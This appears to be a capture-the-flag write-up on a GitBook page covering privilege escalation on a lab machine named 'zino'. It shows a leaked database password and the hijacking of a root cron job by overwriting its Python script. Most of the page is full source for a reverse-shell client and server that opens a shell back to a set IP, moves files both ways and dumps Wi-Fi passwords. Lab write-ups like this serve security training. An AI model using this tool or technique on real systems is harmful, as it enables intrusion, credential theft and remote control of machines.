> For the complete documentation index, see [llms.txt](https://lyethar.gitbook.io/zino/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://lyethar.gitbook.io/zino/priv-escalation.md). # Priv Escalation ``` SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin */3 * * * * root python /var/www/html/booked/cleanup.py ``` Cron job running as root. ``` ╔══════════╣ Searching passwords in config PHP files $conf['settings']['database']['password'] = 'password'; $conf['settings']['password']['minimum.letters'] = '6'; $conf['settings']['password']['minimum.numbers'] = '0'; $conf['settings']['password']['upper.and.lower'] = 'false'; $conf['settings']['database']['password'] = 'RoachSmallDudgeon368'; $conf['settings']['password']['minimum.letters'] = '6'; $conf['settings']['password']['minimum.numbers'] = '0'; $conf['settings']['password']['upper.and.lower'] = 'false'; ``` I can edit the cronjob. ``` www-data@zino:/var/www/html/booked$ echo "lol" >>cleanup.py www-data@zino:/var/www/html/booked$ cat cleanup.py #!/usr/bin/env python import os import sys try: os.system('rm -r /var/www/html/booked/uploads/reservation/* ') except: print 'ERROR...' sys.exit(0) lol ``` Replaced the python file with a python3 reverse shell. ``` www-data@zino:/tmp$ cat client.py > /var/www/html/booked/cleanup.py ``` ![](/files/rGS46AqGidpSH1WLqcjM) This is the client.py that I transferred, I do this with every python file that I can replace. ```python #!/usr/bin/python # -*- coding: utf-8 -*- ############################## # **python reverse shell** # coded by: oseid Aldary ############################## #Client_FILE import struct,socket,subprocess,os,platform,webbrowser as browser # server_config IP = "192.168.49.100" # Your server IP, default: localhost port = 8003 # #Your server Port, default: 4444 ################ class senrev: def __init__(self,sock): self.sock = sock def send(self, data): pkt = struct.pack('>I', len(data)) + data self.sock.sendall(pkt) def recv(self): pktlen = self.recvall(4) if not pktlen: return "" pktlen = struct.unpack('>I', pktlen)[0] return self.recvall(pktlen) def recvall(self, n): packet = b'' while len(packet) < n: frame = self.sock.recv(n - len(packet)) if not frame:return None packet += frame return packet def cnet(): try: ip = socket.gethostbyname("www.google.com") con = socket.create_connection((ip,80), 2) return True except socket.error: pass return False def runCMD(cmd): runcmd = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) return runcmd.stdout.read() + runcmd.stderr.read() def upload(cmd): filetosend = "".join(cmd.split(":download")).strip() if not os.path.isfile(filetosend): controler.send("error: open: '{}': No such file on clinet machine !\n".format(filetosend).encode("UTF-8")) else: controler.send(b"true") with open(filetosend, "rb") as wf: for data in iter(lambda: wf.read(4100), b""): try:controler.send(data) except(KeyboardInterrupt,EOFError): wf.close() controler.send(b":Aborted:") return controler.send(b":DONE:") def wifishow(): try: if platform.system() == "Windows": info = runCMD("netsh wlan show profile name=* key=clear") elif platform.system() == "Linux": info = runCMD("egrep -h -s -A 9 --color -T 'ssid=' /etc/NetworkManager/system-connections/*") else: info = b":osnot:" except Exception: info = b":osnot:" finally: controler.send(info) def download(cmd): filetodown = "".join(cmd.split(":upload")).strip() filetodown = filetodown.split("/")[-1] if "/" in filetodown else filetodown.split("\\")[-1] if "\\" in filetodown else filetodown wf = open(filetodown, "wb") while True: data = controler.recv() if data == b":DONE:":break elif data == b":Aborted:": wf.close() os.remove(filetodown) return wf.write(data) wf.close() controler.send(str(os.getcwd()+os.sep+filetodown).encode("UTF-8")) def browse(cmd): url = "".join(cmd.split(":browse")).strip() browser.open(url) def shell(senrev=senrev): global s global controler mainDIR = os.getcwd() tmpdir="" controler = senrev(s) while True: cmd = controler.recv() if cmd.strip(): cmd = cmd.decode("UTF-8",'ignore').strip() if ":download" in cmd:upload(cmd) elif ":upload" in cmd:download(cmd) elif cmd == ":kill": s.shutdown(2) s.close() break elif ":browse" in cmd: browse(cmd) elif cmd == ":check_internet_connection": if cnet() == True: controler.send(b"UP") else: controler.send(b"Down") elif cmd == ":wifi": wifishow() elif "cd" in cmd: dirc = "".join(cmd.split("cd")).strip() if not dirc.strip() : controler.send("{}\n".format(os.getcwd()).encode("UTF-8")) elif dirc == "-": if not tmpdir: controler.send(b"error: cd: old [PAWD] not set yet !\n") else: tmpdir2 = os.getcwd() os.chdir(tmpdir) controler.send("Back to dir[ {}/ ]\n".format(tmpdir).encode("UTF-8")) tmpdir = tmpdir2 elif dirc =="--": tmpdir = os.getcwd() os.chdir(mainDIR) controler.send("Back to first dir[ {}/ ]\n".format(mainDIR).encode("UTF-8")) else: if not os.path.isdir(dirc): controler.send("error: cd: '{}': No such file or directory on clinet machine !\n".format(dirc).encode("UTF-8")) else: tmpdir = os.getcwd() os.chdir(dirc) controler.send("Changed to dir[ {}/ ]\n".format(dirc).encode("UTF-8")) elif cmd == "pwd": controler.send(str(os.getcwd()+"\n").encode("UTF-8")) else: cmd_output = runCMD(cmd) controler.send(bytes(cmd_output)) exit(1) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((IP, port)) shell() except Exception: exit(1) ``` This is the server. ```python #!/usr/bin/python # -*- coding: utf-8 -*- ############################## # **python reverse shell** # coded by: oseid Aldary ############################## #Server_File import socket,struct,sys,os;from datetime import datetime try: input = raw_input except NameError: input = input class senrev: def __init__(self,sock): self.sock = sock def send(self, data): pkt = struct.pack('>I', len(data)) + data self.sock.sendall(pkt) def recv(self): pktlen = self.recvall(4) if not pktlen: return "" pktlen = struct.unpack('>I', pktlen)[0] return self.recvall(pktlen) def recvall(self, n): packet = b'' while len(packet) < n: frame = self.sock.recv(n - len(packet)) if not frame:return None packet += frame return packet def help(): print(""" Commands Desscription ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ :help Show this help message :download Download file from client machine :upload Upload file to client machine :kill Kill the connection with client machine :exec Run external command :check Check if client machine is connected to internet :wifi Show Client machine wifi info [names,passwod,etc] :browse Open an website on client machine browser pwd Print working directory in client machine cd - Switch back to previous directory in client machine cd -- Switch back to first directory when connection was established with client machine """) def download(filee): cmd = filee filee = "".join(filee.split(":download")).strip() if filee.strip(): filetodown = filee.split("/")[-1] if "/" in filee else filee.split("\\")[-1] if "\\" in filee else filee controler.send(cmd.encode("UTF-8")) down = controler.recv().decode("UTF-8",'ignore') if down == "true": print("[~] Downloading [ {} ]...".format(filetodown)) wf = open(filetodown, "wb") while True: data = controler.recv() if data == b":DONE:": break elif data == b":Aborted:": wf.close() os.remove(filetodown) print("[!] Downloading Has Aborted By Client!") return wf.write(data) wf.close() print("[*] Download Complete :)\n[*] file Saved In : {}\n".format(os.getcwd()+os.sep+filetodown)) else: print(down) else: print("Usage: :download \n") def upload(cmd): filetoup = "".join(cmd.split(":upload")).strip() if not filetoup.strip(): print("usage: :upload \n") else: if not os.path.isfile(filetoup): print("error: open: no such file: "+filetoup+"\n") else: controler.send(cmd.encode("UTF-8")) print("[~] Uploading [ {} ]...".format(filetoup)) with open(filetoup,"rb") as wf: for data in iter(lambda: wf.read(4100), b""): try:controler.send(data) except(KeyboardInterrupt,EOFError): wf.close() controler.send(b":Aborted:") print("[!] Uploading Has Been Aborted By User!\n") return controler.send(b":DONE:") savedpath = controler.recv().decode("UTF-8") print("[*] Upload Complete :)\n[*] File uploaded in : "+str(savedpath).strip()+" in client machine\n") def check_con(): print("[~] Checking....") controler.send(b":check_internet_connection") status = controler.recv().decode("UTF-8").strip() if status == "UP": print("[*] client: Connected to internet !\n") else: print("[!] client: Not Connected to internet !\n") def browse(cmd): url = "".join(cmd.split(":browse")).strip() if not url.strip(): print("Usage: :browse \n") else: if not url.startswith(("http://","https://")): url = "http://"+url print("[~] Opening [ {} ]...".format(url)) controler.send(":browse {}".format(url).encode("UTF-8")) print("[*] Done \n") def control(): try: cmd = str(input("[{}]:~# ".format(a[0]))) while not cmd.strip(): cmd = str(input("[{}]:~# ".format(a[0]))) if cmd == ":help": help() control() elif ":download" in cmd: download(cmd) control() elif ":upload" in cmd: upload(cmd) control() elif cmd ==":kill": print("[!] Connection has been killed!") controler.send(b":kill") c.shutdown(2) c.close() s.close() exit(1) elif ":exec" in cmd: cmd = "".join(cmd.split(":exec")).strip() if not cmd.strip(): print("Usage: :exec \n") else: print("[*] exec:") os.system(cmd) print(" ") control() elif cmd == ":check": check_con() control() elif cmd == ":wifi": print("[*] Geting Wifi profiles info...") controler.send(b":wifi") info = controler.recv() try: info = info.decode("UTF-8","ignore") except UnicodeEncodeError: info = info finally: if info==":osnot:": print("[!] Sorry, i can't found wifi info of client machine!\n") else: print("[*] INFO:\n") print(info + "\n") control() elif ":browse" in cmd: browse(cmd) control() elif cmd.lower() == "cls" or cmd == "clear": os.system("cls||clear") control() controler.send(cmd.encode("UTF-8")) DATA = controler.recv() if DATA.strip(): print(DATA.decode("UTF-8",'ignore')) control() except (KeyboardInterrupt, EOFError): print(" ") control() except socket.error: print("[!] Connection Lost to: "+a[0]+" !") c.close() s.close() exit(1) except UnicodeEncodeError: print(DATA) print(" ") control() except Exception as e: print("[!] An error occurred: "+str(e)+"\n") control() def server(IP,PORT,senrev=senrev): global s global c global a global controler s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind((IP,PORT)) s.listen(1) print("[*] Server started on > {}:{} < | at [{}]".format(IP,PORT,datetime.now().strftime("%H:%M:%S"))) try: c,a = s.accept() controler = senrev(c) print("\n[*] Connection From {}:{}".format(a[0],a[1])) print("[*] type ':help' to show help message\n") control() except (KeyboardInterrupt,EOFError): print(" ") exit(1) if len(sys.argv) !=3: print("Usage: python server.py ") exit(1) server(sys.argv[1],int(sys.argv[2])) ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://lyethar.gitbook.io/zino/priv-escalation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.